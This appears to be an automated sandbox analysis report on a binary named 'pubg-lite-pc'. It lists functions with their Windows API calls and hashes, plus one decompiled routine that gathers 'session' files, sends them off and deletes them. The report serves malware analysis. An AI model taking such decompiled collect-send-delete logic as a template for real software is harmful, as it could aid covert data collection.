                                                                                                • Instruction Fuzzy Hash: 5AB15BB1A00349DFDB14DF58E94479EBBE1FB85320F20826EE8259B3D1E7759A04CB91
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 0092DE70 Relevance: 15.9, APIs: 4, Strings: 5, Instructions: 119COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • EnterCriticalSection.KERNEL32(00B0380C,F4D3B90A,00000000,?,?,?,?,?,?,0092D6D0,00A671AD,000000FF), ref: 0092DEAD
                                                                                                • LoadCursorW.USER32(00000000,00007F00), ref: 0092DF28
                                                                                                • LoadCursorW.USER32(00000000,00007F00), ref: 0092DFCE
                                                                                                • LeaveCriticalSection.KERNEL32(00B0380C), ref: 0092E023
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: CriticalCursorLoadSection$EnterLeave
                                                                                                • String ID: @,w$AtlAxWin140$AtlAxWinLic140$WM_ATLGETCONTROL$WM_ATLGETHOST
                                                                                                • API String ID: 3727441302-454842634
                                                                                                • Opcode ID: 237c17582467bd22e57dfaeeaa13cd761d263963b8f38dbc2ec7ac6fbed669c8
                                                                                                • Instruction ID: 1b3d7729ccce494474d8bfdc9272f442098f3995dbb0824664588a5d8bc9b996
                                                                                                • Opcode Fuzzy Hash: 237c17582467bd22e57dfaeeaa13cd761d263963b8f38dbc2ec7ac6fbed669c8
                                                                                                • Instruction Fuzzy Hash: B55117B1D11319AFDB11CFA4D8487DEBFF8FB08714F14415AE404AB290DBB45A09CBA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 009B4590 Relevance: 14.5, APIs: 7, Strings: 1, Instructions: 482COMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • GetStdHandle.KERNEL32(000000F5,?,F4D3B90A,?,?), ref: 009B48E6
                                                                                                • GetConsoleScreenBufferInfo.KERNEL32(00000000,?,?), ref: 009B48ED
                                                                                                • GetStdHandle.KERNEL32(000000F5,0000000C,?,?), ref: 009B4901
                                                                                                • SetConsoleTextAttribute.KERNEL32(00000000,?,?), ref: 009B4908
                                                                                                  • Part of subcall function 00A45A61: EnterCriticalSection.KERNEL32(00B0282C,?,?,?,00929396,00B0345C,F4D3B90A,?,?,00A65C3D,000000FF,?,009EA9BC,F4D3B90A), ref: 00A45A6C
                                                                                                  • Part of subcall function 00A45A61: LeaveCriticalSection.KERNEL32(00B0282C,?,00929396,00B0345C,F4D3B90A,?,?,00A65C3D,000000FF,?,009EA9BC,F4D3B90A), ref: 00A45AA9
                                                                                                • GetStdHandle.KERNEL32(000000F5,000000FF,?,00000000,?,00000000,00AAB998,00000002,?,?), ref: 009B499C
                                                                                                • SetConsoleTextAttribute.KERNEL32(00000000,?,?), ref: 009B49A3
                                                                                                • IsWindow.USER32(00000000), ref: 009B4BB2
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: ConsoleHandle$AttributeCriticalSectionText$BufferEnterInfoLeaveScreenWindow
                                                                                                • String ID: Error
                                                                                                • API String ID: 2793546057-2619118453
                                                                                                • Opcode ID: 93c92ef449c9120ac17ad97926a1090e64bd341688ef7c0d511c96d6d9b7df44
                                                                                                • Instruction ID: 5d4d5b57063285ac9869fdcd0efe3b1b7fb32bbedfed72c8a310e809b2b16c6c
                                                                                                • Opcode Fuzzy Hash: 93c92ef449c9120ac17ad97926a1090e64bd341688ef7c0d511c96d6d9b7df44
                                                                                                • Instruction Fuzzy Hash: 41229B70E00358DFDB10CFA4C988BDEBBB4BF55324F204299E459AB291DB749A88CF51
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 00985AF0 Relevance: 14.4, APIs: 2, Strings: 6, Instructions: 368windowCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • SendMessageW.USER32(?,0000110A,00000004,00000000), ref: 00985BC0
                                                                                                • SendMessageW.USER32(?,0000110A,00000001,00000000), ref: 00985E49
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: MessageSend
                                                                                                • String ID: Child$Cost$Neg$Parent$Pos$Sel
                                                                                                • API String ID: 3850602802-107250081
                                                                                                • Opcode ID: f35d2e98138a42806231f74ea2da877972335fb04c0a6cd68c348e6ce0486202
                                                                                                • Instruction ID: 606c3386f2dd48e2b319a9333bb1d6d5edba482f4135e5b111e4f9b2eeef1ec5
                                                                                                • Opcode Fuzzy Hash: f35d2e98138a42806231f74ea2da877972335fb04c0a6cd68c348e6ce0486202
                                                                                                • Instruction Fuzzy Hash: 65F18A30D10258DFDB14DFA4CC55BEEBBB9BF49304F104199E509AB291DB706E89CBA1
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 009B77A0 Relevance: 14.3, APIs: 2, Strings: 6, Instructions: 342libraryloaderCOMMON
                                                                                                Download Yara Rule
                                                                                                APIs
                                                                                                • LoadLibraryA.KERNEL32(Dbghelp.dll,SymFromAddr,?,F4D3B90A,?,00000000,00000000,?), ref: 009B7BA7
                                                                                                • GetProcAddress.KERNEL32(00000000), ref: 009B7BAE
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66185183039.0000000000921000.00000020.00000001.01000000.00000003.sdmp, Offset: 00920000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66185069689.0000000000920000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66192935449.0000000000A9E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195027181.0000000000AFD000.00000004.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195303684.0000000000B04000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195530024.0000000000B0E000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66195876995.0000000000B1B000.00000002.00000001.01000000.00000003.sdmpDownload File
                                                                                                Joe Sandbox IDA Plugin
                                                                                                • Snapshot File: hcaresult_1_2_920000_pubg-lite-pc.jbxd
                                                                                                Similarity
                                                                                                • API ID: AddressLibraryLoadProc
                                                                                                • String ID: -> $%hs()$%hs:%ld$Dbghelp.dll$SymFromAddr$[0x%.8Ix]
                                                                                                • API String ID: 2574300362-1541941317
                                                                                                • Opcode ID: 28724937dd5b7cdaa5a35dfb55a19c42ba442e9b00dfbe44dc80831c7986304c
                                                                                                • Instruction ID: 8bb8ec5285ae23dd4c5189327c0114efa969fd9c1b73fd3dfda31ed4bce7597d
                                                                                                • Opcode Fuzzy Hash: 28724937dd5b7cdaa5a35dfb55a19c42ba442e9b00dfbe44dc80831c7986304c
                                                                                                • Instruction Fuzzy Hash: 5FE18C709102589FDB24DF68CD99BEEBBB8FF84314F104699E409A7281DB755B84CF90
                                                                                                Uniqueness

                                                                                                Uniqueness Score: -1.00%

                                                                                                Function 6D970FA0 Relevance: 14.3, APIs: 2, Strings: 6, Instructions: 341fileCOMMON
                                                                                                Download Yara Rule
                                                                                                C-Code - Quality: 76%
                                                                                                			E6D970FA0(void* __ebx, void** __ecx, void* __edi, intOrPtr _a4, intOrPtr _a8) {
				signed int _v8;
				signed int _v12;
				signed int _v16;
				signed int _v20;
				void* _v24;
				void* _v28;
				char _v44;
				void* _v48;
				void* _v52;
				char _v68;
				char _v92;
				char _v116;
				char _v140;
				char _v164;
				int _v172;
				short _v724;
				intOrPtr _v726;
				struct _WIN32_FIND_DATAW _v772;
				void* _v776;
				char _v780;
				char _v784;
				intOrPtr _v788;
				void* _v804;
				char _v812;
				void** _v816;
				void** _v820;
				void* _v840;
				char _v848;
				void** _v852;
				signed int _v856;
				void* __esi;
				void* __ebp;
				signed int _t149;
				signed int _t150;
				void* _t156;
				intOrPtr* _t164;
				void* _t165;
				int _t169;
				intOrPtr* _t172;
				intOrPtr _t174;
				signed int _t178;
				WCHAR* _t196;
				void* _t200;
				void* _t206;
				signed int _t221;
				void* _t225;
				void* _t230;
				void* _t235;
				signed int _t238;
				signed int _t240;
				intOrPtr* _t249;
				intOrPtr* _t253;
				signed int _t256;
				intOrPtr _t261;
				void* _t263;
				void** _t264;
				intOrPtr* _t280;
				intOrPtr _t293;
				void* _t301;
				intOrPtr* _t318;
				intOrPtr* _t319;
				intOrPtr* _t321;
				intOrPtr* _t323;
				intOrPtr* _t327;
				intOrPtr* _t332;
				intOrPtr* _t334;
				void** _t336;
				void* _t338;
				int _t341;
				void** _t342;
				void** _t343;
				signed int _t346;
				signed int _t347;
				void* _t349;
				signed int _t350;
				signed int _t352;

				_t264 = __ecx;
				_push(0xffffffff);
				_push(0x6d9b5fb8);
				_push( *[fs:0x0]);
				_t350 = _t349 - 0x304;
				_t149 =  *0x6d9e5024; // 0xe85bfa76
				_t150 = _t149 ^ _t346;
				_v20 = _t150;
				_push(__ebx);
				_push(_t338);
				_push(__edi);
				_push(_t150);
				 *[fs:0x0] =  &_v16;
				_t334 = __ecx;
				_t261 = _a4;
				_v788 = _a8;
				if( *((intOrPtr*)( *((intOrPtr*)( *__ecx + 8))))() != 0) {
					_t156 = L6D965D90(_t261, __ecx, _t338);
					__eflags =  *((char*)(_t156 + 0x1c));
					if( *((char*)(_t156 + 0x1c)) == 0) {
						goto L10;
					} else {
						_t338 = L6D965D90(_t261, __ecx, _t338);
						_t206 = L6D966B50();
						__eflags = _t206;
						if(_t206 == 0) {
							goto L49;
						} else {
							_v780 =  *((intOrPtr*)( *_t206 + 0xc))() + 0x10;
							_v8 = 0xc;
							_t264 =  &_v780;
							L6D966370(_t261, _t264, L"Logging is enabled, sending data ...", 0x24);
							_t235 = L6D966B50();
							__eflags = _t235;
							if(_t235 == 0) {
								goto L49;
							} else {
								_v784 =  *((intOrPtr*)( *_t235 + 0xc))() + 0x10;
								_v8 = 0xf;
								_t238 = L6D966370(_t261,  &_v784, 0x6d9c6670, 0);
								__eflags =  *(_t338 + 0x38);
								if(__eflags != 0) {
									_t238 = L6D965E70(_t261, _t338, _t334, _t338, __eflags,  &_v780);
								}
								_v8 = 0xc;
								_t327 = _v784 + 0xfffffff0;
								asm("lock xadd [edx+0xc], eax");
								_t240 = (_t238 | 0xffffffff) - 1;
								__eflags = _t240;
								if(_t240 <= 0) {
									_t240 =  *((intOrPtr*)( *((intOrPtr*)( *_t327)) + 4))(_t327);
								}
								goto L8;
							}
						}
					}
				} else {
					if( *((char*)(L6D965D90(_t261, __ecx, _t338) + 0x1c)) == 0) {
						L10:
						E6D964D40(_t261,  &_v116, _t318, _t346, _t261);
						_v8 = 0x16;
						_push(3);
						_v28 = 0;
						_v24 = 0;
						_push("*.*");
						_v28 = 0;
						_v24 = 7;
						_v44 = 0;
						L6D965AF0(_t261,  &_v44, _t318);
						_v8 = 0x17;
						L6D971800(_t261,  &_v116, _t334, _t338, _t361,  &_v44);
						_v8 = 0x16;
						L6D965CF0(_t261,  &_v44, _t334);
						L50();
						_v8 = 0x18;
						_t164 = E6D976D40( &_v116, _t318, _t334, _t338,  &_v92);
						_v8 = 0x19;
						if( *((intOrPtr*)(_t164 + 0x14)) >= 8) {
							_t164 =  *_t164;
						}
						_push(_t164);
						_t165 = L6D981C80( &_v776, _t318, _t334, _t338);
						_v8 = 0x18;
						L6D965CF0(_t261,  &_v92, _t334);
						if(_t165 != 0) {
							_t169 = _v172;
							do {
								if(_v776 != 0) {
									__eflags = _t169;
									if(_t169 != 0) {
										_t169 = FindNextFileW(_v776,  &_v772);
										_v172 = _t169;
										_t341 = _t169;
										goto L27;
									} else {
										_t341 = 0;
										goto L33;
									}
								} else {
									_t341 = 0;
									L27:
									if(_t169 == 0 || (_v772.dwFileAttributes >> 0x00000004 & 0x00000001) == 0 || _v772.cFileName != 0x2e) {
										L33:
										_push( &_v784);
										_t172 = L6D982080( &_v776, _t334, _t341);
										_v8 = 0x1a;
										_t319 =  *_t172;
										_t280 = _t319;
										_v28 = 0;
										_v24 = 0;
										_v28 = 0;
										_v24 = 7;
										_v44 = 0;
										_t263 = _t280 + 2;
										do {
											_t174 =  *_t280;
											_t280 = _t280 + 2;
											_t372 = _t174;
										} while (_t174 != 0);
										_push(_t280 - _t263 >> 1);
										_push(_t319);
										L6D965AF0(_t263,  &_v44, _t319);
										_v8 = 0x1b;
										L6D976B10( &_v92, _t372,  &_v44);
										_v8 = 0x1d;
										_t178 = L6D965CF0(_t263,  &_v44, _t334);
										_v8 = 0x1e;
										_t321 = _v784 + 0xfffffff0;
										asm("lock xadd [edx+0xc], eax");
										if((_t178 | 0xffffffff) - 1 <= 0) {
											 *((intOrPtr*)( *((intOrPtr*)( *_t321)) + 4))(_t321);
										}
										_push(7);
										_v52 = 0;
										_v48 = 0;
										_push(L"session");
										_v52 = 0;
										_v48 = 7;
										_v68 = 0;
										L6D965AF0(_t263,  &_v68, _t321);
										_v8 = 0x20;
										_push( &_v68);
										_t261 = E6D976BF0( &_v92);
										_v8 = 0x1e;
										L6D965CF0(_t261,  &_v68, _t334);
										if(_t261 != 0) {
											if( *((intOrPtr*)( *((intOrPtr*)( *_t334 + 8))))() != 0) {
												_t200 = E6D976D40( &_v92, _t321, _t334, _t341,  &_v140);
												_v8 = 0x21;
												_push(_v788);
												_push(_t200);
												L6D9715E0(_t261, _t321, _t334, _t341);
												_v8 = 0x1e;
												L6D965CF0(_t261,  &_v140, _t334);
											}
											_t196 = E6D976D40( &_v92, _t321, _t334, _t341,  &_v164);
											_v8 = 0x22;
											if(_t196[0xa] >= 8) {
												_t196 =  *_t196;
											}
											DeleteFileW(_t196);
											_v8 = 0x1e;
											L6D965CF0(_t261,  &_v164, _t334);
										}
										if(_v172 != 0 && (_v772.dwFileAttributes >> 0x00000004 & 0x00000001) != 0) {
											E6D970FA0(_t261, _t334, _t334,  &_v92, _v788);
										}
										_v8 = 0x18;
										L6D965CF0(_t261,  &_v92, _t334);
										_t169 = _v172;
									} else {
										_t293 = _v726;
										if(_t293 != 0 && (_t293 != 0x2e || _v724 != 0)) {
											goto L33;
										}
									}
								}
							} while (_t341 != 0);
						}
						_v8 = 0x16;
						L53();
						_v8 = 0xffffffff;
						L6D965CF0(_t261,  &_v116, _t334);
						 *[fs:0x0] = _v16;
						return L6D98A13F(_v20 ^ _t346);
					} else {
						_t338 = L6D965D90(_t261, __ecx, _t338);
						_t249 = L6D966B50();
						if(_t249 == 0) {
							L49:
							E6D966820(0x80004005);
							asm("int3");
							_push(_t346);
							_t347 = _t350;
							_push(0xffffffff);
							_push(0x6d9b6013);
							_push( *[fs:0x0]);
							_push(_t338);
							_push(_t334);
							_push( *0x6d9e5024 ^ _t347);
							 *[fs:0x0] =  &_v812;
							_t342 = _t264;
							_v816 = _t342;
							 *_t342 = 0;
							_t342[0x96] = 0x5c;
							_t342[0x95] = 0;
							_t342[0x97] = 0;
							L6D98C450(_t334,  &(_t342[1]), 0, 0x250);
							_t352 = _t350 - 8 + 0xc;
							_v804 = 0;
							_t336 =  &(_t342[0x98]);
							_v820 = _t336;
							_t301 = L6D966B50();
							__eflags = _t301;
							if(_t301 == 0) {
								E6D966820(0x80004005);
								asm("int3");
								asm("int3");
								_push(_t347);
								_push(0xffffffff);
								_push(0x6d9b6053);
								_push( *[fs:0x0]);
								_push(_t342);
								_push( *0x6d9e5024 ^ _t352);
								 *[fs:0x0] =  &_v848;
								_t343 = _t301;
								_v852 = _t343;
								_v840 = 0;
								_t221 =  &(_t343[0x98]);
								_v856 = _t221;
								_v840 = 0;
								_t323 =  *_t221 - 0x10;
								asm("lock xadd [edx+0xc], eax");
								__eflags = (_t221 | 0xffffffff) - 1;
								if((_t221 | 0xffffffff) - 1 <= 0) {
									 *((intOrPtr*)( *((intOrPtr*)( *_t323)) + 4))(_t323);
								}
								_v16 = 0xffffffff;
								_t343[0x97] = 0;
								L6D98A8DA(_t343[0x95]);
								_t225 =  *_t343;
								_t343[0x95] = 0;
								__eflags = _t225;
								if(_t225 != 0) {
									__eflags = _t225 - 0xffffffff;
									if(_t225 != 0xffffffff) {
										_t225 = FindClose(_t225);
										 *_t343 = 0;
									}
								}
								 *[fs:0x0] = _v24;
								return _t225;
							} else {
								_t230 =  *((intOrPtr*)( *_t301 + 0xc))() + 0x10;
								__eflags = _t230;
								 *_t336 = _t230;
								_v12 = 0xffffffff;
								 *[fs:0x0] = _v20;
								return _t342;
							}
						} else {
							_v780 =  *((intOrPtr*)( *_t249 + 0xc))() + 0x10;
							_v8 = 2;
							_t264 =  &_v780;
							L6D966370(_t261, _t264, L"Logging is disabled, discard collected data.", 0x2c);
							_t253 = L6D966B50();
							if(_t253 == 0) {
								goto L49;
							} else {
								_v784 =  *((intOrPtr*)( *_t253 + 0xc))() + 0x10;
								_v8 = 5;
								_t256 = L6D966370(_t261,  &_v784, 0x6d9c6670, 0);
								_t359 =  *(_t338 + 0x38);
								if( *(_t338 + 0x38) != 0) {
									_t256 = L6D965E70(_t261, _t338, _t334, _t338, _t359,  &_v780);
								}
								_v8 = 2;
								_t332 = _v784 + 0xfffffff0;
								asm("lock xadd [edx+0xc], eax");
								_t240 = (_t256 | 0xffffffff) - 1;
								if(_t240 <= 0) {
									_t240 =  *((intOrPtr*)( *((intOrPtr*)( *_t332)) + 4))(_t332);
								}
								L8:
								_v8 = 0xffffffff;
								_t318 = _v780 + 0xfffffff0;
								asm("lock xadd [edx+0xc], eax");
								_t361 = (_t240 | 0xffffffff) - 1;
								if((_t240 | 0xffffffff) - 1 <= 0) {
									 *((intOrPtr*)( *((intOrPtr*)( *_t318)) + 4))(_t318);
								}
								goto L10;
							}
						}
					}
				}
			}















































































                                                                                                0x6d970fa0
                                                                                                0x6d970fa3
                                                                                                0x6d970fa5
                                                                                                0x6d970fb0
                                                                                                0x6d970fb1
                                                                                                0x6d970fb7
                                                                                                0x6d970fbc
                                                                                                0x6d970fbe
                                                                                                0x6d970fc1
                                                                                                0x6d970fc2
                                                                                                0x6d970fc3
                                                                                                0x6d970fc4
                                                                                                0x6d970fc8
                                                                                                0x6d970fce
                                                                                                0x6d970fd3
                                                                                                0x6d970fd6
                                                                                                0x6d970fe5
                                                                                                0x6d971185
                                                                                                0x6d97118a
                                                                                                0x6d97118e
                                                                                                0x00000000
                                                                                                0x6d971194
                                                                                                0x6d971199
                                                                                                0x6d97119b
                                                                                                0x6d9711a0
                                                                                                0x6d9711a2
                                                                                                0x00000000
                                                                                                0x6d9711a8
                                                                                                0x6d9711b2
                                                                                                0x6d9711b8
                                                                                                0x6d9711bf
                                                                                                0x6d9711cc
                                                                                                0x6d9711d1
                                                                                                0x6d9711d6
                                                                                                0x6d9711d8
                                                                                                0x00000000
                                                                                                0x6d9711de
                                                                                                0x6d9711e8
                                                                                                0x6d9711ee
                                                                                                0x6d9711ff
                                                                                                0x6d971204
                                                                                                0x6d971208
                                                                                                0x6d971213
                                                                                                0x6d971213
                                                                                                0x6d971218
                                                                                                0x6d971225
                                                                                                0x6d971228
                                                                                                0x6d97122d
                                                                                                0x6d97122e
                                                                                                0x6d971230
                                                                                                0x6d971237
                                                                                                0x6d971237
                                                                                                0x00000000
                                                                                                0x6d97123a
                                                                                                0x6d9711d8
                                                                                                0x6d9711a2
                                                                                                0x6d970feb
                                                                                                0x6d970ff4
                                                                                                0x6d9710c5
                                                                                                0x6d9710c9
                                                                                                0x6d9710ce
                                                                                                0x6d9710d7
                                                                                                0x6d9710d9
                                                                                                0x6d9710e3
                                                                                                0x6d9710ea
                                                                                                0x6d9710ef
                                                                                                0x6d9710f6
                                                                                                0x6d9710fd
                                                                                                0x6d971101
                                                                                                0x6d971106
                                                                                                0x6d971111
                                                                                                0x6d971116
                                                                                                0x6d97111d
                                                                                                0x6d971128
                                                                                                0x6d97112d
                                                                                                0x6d971138
                                                                                                0x6d97113d
                                                                                                0x6d971145
                                                                                                0x6d971147
                                                                                                0x6d971147
                                                                                                0x6d971149
                                                                                                0x6d971150
                                                                                                0x6d971157
                                                                                                0x6d97115e
                                                                                                0x6d971165
                                                                                                0x6d97116b
                                                                                                0x6d971171
                                                                                                0x6d971178
                                                                                                0x6d97123f
                                                                                                0x6d971241
                                                                                                0x6d971254
                                                                                                0x6d97125a
                                                                                                0x6d971260
                                                                                                0x00000000
                                                                                                0x6d971243
                                                                                                0x6d971243
                                                                                                0x00000000
                                                                                                0x6d971243
                                                                                                0x6d97117e
                                                                                                0x6d97117e
                                                                                                0x6d971262
                                                                                                0x6d971264
                                                                                                0x6d9712a2
                                                                                                0x6d9712a8
                                                                                                0x6d9712af
                                                                                                0x6d9712b4
                                                                                                0x6d9712b8
                                                                                                0x6d9712bc
                                                                                                0x6d9712be
                                                                                                0x6d9712c5
                                                                                                0x6d9712cc
                                                                                                0x6d9712d3
                                                                                                0x6d9712da
                                                                                                0x6d9712de
                                                                                                0x6d9712e1
                                                                                                0x6d9712e1
                                                                                                0x6d9712e4
                                                                                                0x6d9712e7
                                                                                                0x6d9712e7
                                                                                                0x6d9712f0
                                                                                                0x6d9712f1
                                                                                                0x6d9712f5
                                                                                                0x6d9712fa
                                                                                                0x6d971305
                                                                                                0x6d97130a
                                                                                                0x6d971311
                                                                                                0x6d971316
                                                                                                0x6d971323
                                                                                                0x6d971326
                                                                                                0x6d97132e
                                                                                                0x6d971335
                                                                                                0x6d971335
                                                                                                0x6d971338
                                                                                                0x6d97133c
                                                                                                0x6d971343
                                                                                                0x6d97134d
                                                                                                0x6d971352
                                                                                                0x6d971359
                                                                                                0x6d971360
                                                                                                0x6d971364
                                                                                                0x6d971369
                                                                                                0x6d971370
                                                                                                0x6d971379
                                                                                                0x6d97137b
                                                                                                0x6d971382
                                                                                                0x6d971389
                                                                                                0x6d971396
                                                                                                0x6d9713a2
                                                                                                0x6d9713a7
                                                                                                0x6d9713ab
                                                                                                0x6d9713b1
                                                                                                0x6d9713b2
                                                                                                0x6d9713b7
                                                                                                0x6d9713c1
                                                                                                0x6d9713c1
                                                                                                0x6d9713d0
                                                                                                0x6d9713d5
                                                                                                0x6d9713dd
                                                                                                0x6d9713df
                                                                                                0x6d9713df
                                                                                                0x6d9713e2
                                                                                                0x6d9713e8
                                                                                                0x6d9713f2
                                                                                                0x6d9713f2
                                                                                                0x6d9713fe
                                                                                                0x6d97141a
                                                                                                0x6d97141a
                                                                                                0x6d97141f
                                                                                                0x6d971426
                                                                                                0x6d97142b
                                                                                                0x6d97127e
                                                                                                0x6d97127e
                                                                                                0x6d971288
                                                                                                0x00000000
                                                                                                0x00000000
                                                                                                0x6d971288
                                                                                                0x6d971264
                                                                                                0x6d971431
                                                                                                0x6d971171
                                                                                                0x6d971439
                                                                                                0x6d971443
                                                                                                0x6d971448
                                                                                                0x6d971452
                                                                                                0x6d97145a
                                                                                                0x6d971472
                                                                                                0x6d970ffa
                                                                                                0x6d970fff
                                                                                                0x6d971001
                                                                                                0x6d971008
                                                                                                0x6d971475
                                                                                                0x6d97147a
                                                                                                0x6d97147f
                                                                                                0x6d971480
                                                                                                0x6d971481
                                                                                                0x6d971483
                                                                                                0x6d971485
                                                                                                0x6d971490
                                                                                                0x6d971494
                                                                                                0x6d971495
                                                                                                0x6d97149d
                                                                                                0x6d9714a1
                                                                                                0x6d9714a7
                                                                                                0x6d9714a9
                                                                                                0x6d9714b1
                                                                                                0x6d9714bc
                                                                                                0x6d9714c9
                                                                                                0x6d9714d3
                                                                                                0x6d9714dd
                                                                                                0x6d9714e2
                                                                                                0x6d9714e5
                                                                                                0x6d9714ec
                                                                                                0x6d9714f2
                                                                                                0x6d9714fa
                                                                                                0x6d9714fc
                                                                                                0x6d9714fe
                                                                                                0x6d971529
                                                                                                0x6d97152e
                                                                                                0x6d97152f
                                                                                                0x6d971530
                                                                                                0x6d971533
                                                                                                0x6d971535
                                                                                                0x6d971540
                                                                                                0x6d971544
                                                                                                0x6d97154c
                                                                                                0x6d971550
                                                                                                0x6d971556
                                                                                                0x6d971558
                                                                                                0x6d97155b
                                                                                                0x6d971562
                                                                                                0x6d971568
                                                                                                0x6d97156b
                                                                                                0x6d971574
                                                                                                0x6d971577
                                                                                                0x6d97157d
                                                                                                0x6d97157f
                                                                                                0x6d971586
                                                                                                0x6d971586
                                                                                                0x6d971589
                                                                                                0x6d971596
                                                                                                0x6d9715a0
                                                                                                0x6d9715a5
                                                                                                0x6d9715aa
                                                                                                0x6d9715b4
                                                                                                0x6d9715b6
                                                                                                0x6d9715b8
                                                                                                0x6d9715bb
                                                                                                0x6d9715be
                                                                                                0x6d9715c4
                                                                                                0x6d9715c4
                                                                                                0x6d9715bb
                                                                                                0x6d9715cd
                                                                                                0x6d9715d9
                                                                                                0x6d971500
                                                                                                0x6d971505
                                                                                                0x6d971505
                                                                                                0x6d971508
                                                                                                0x6d97150a
                                                                                                0x6d971516
                                                                                                0x6d971523
                                                                                                0x6d971523
                                                                                                0x6d97100e
                                                                                                0x6d971018
                                                                                                0x6d97101e
                                                                                                0x6d971025
                                                                                                0x6d971032
                                                                                                0x6d971037
                                                                                                0x6d97103e
                                                                                                0x00000000
                                                                                                0x6d971044
                                                                                                0x6d97104e
                                                                                                0x6d971054
                                                                                                0x6d971065
                                                                                                0x6d97106a
                                                                                                0x6d97106e
                                                                                                0x6d971079
                                                                                                0x6d971079
                                                                                                0x6d97107e
                                                                                                0x6d97108b
                                                                                                0x6d97108e
                                                                                                0x6d971093
                                                                                                0x6d971096
                                                                                                0x6d97109d
                                                                                                0x6d97109d
                                                                                                0x6d9710a0
                                                                                                0x6d9710a0
                                                                                                0x6d9710b0
                                                                                                0x6d9710b3
                                                                                                0x6d9710b9
                                                                                                0x6d9710bb
                                                                                                0x6d9710c2
                                                                                                0x6d9710c2
                                                                                                0x00000000
                                                                                                0x6d9710bb
                                                                                                0x6d97103e
                                                                                                0x6d971008
                                                                                                0x6d970ff4

                                                                                                APIs
                                                                                                  • Part of subcall function 6D966B50: GetProcessHeap.KERNEL32 ref: 6D966BAC
                                                                                                • FindNextFileW.KERNEL32(00000000,?,00000000,?,6D9B5FB8,*.*,00000003,?,?,00000000,7FFFFFFE), ref: 6D971254
                                                                                                • DeleteFileW.KERNEL32(00000000,?,?,?,00000000,?,00000000,7FFFFFFE), ref: 6D9713E2
                                                                                                Strings
                                                                                                Memory Dump Source
                                                                                                • Source File: 00000001.00000002.66249601423.000000006D941000.00000020.00000001.01000000.00000009.sdmp, Offset: 6D940000, based on PE: true
                                                                                                • Associated: 00000001.00000002.66249463542.000000006D940000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66254569554.000000006D9BB000.00000002.00000001.01000000.00000009.sdmpDownload File
                                                                                                • Associated: 00000001.00000002.66256348275.000000006D9E5000.00000004.00000001.01000000.00000009.sdmpDownload File
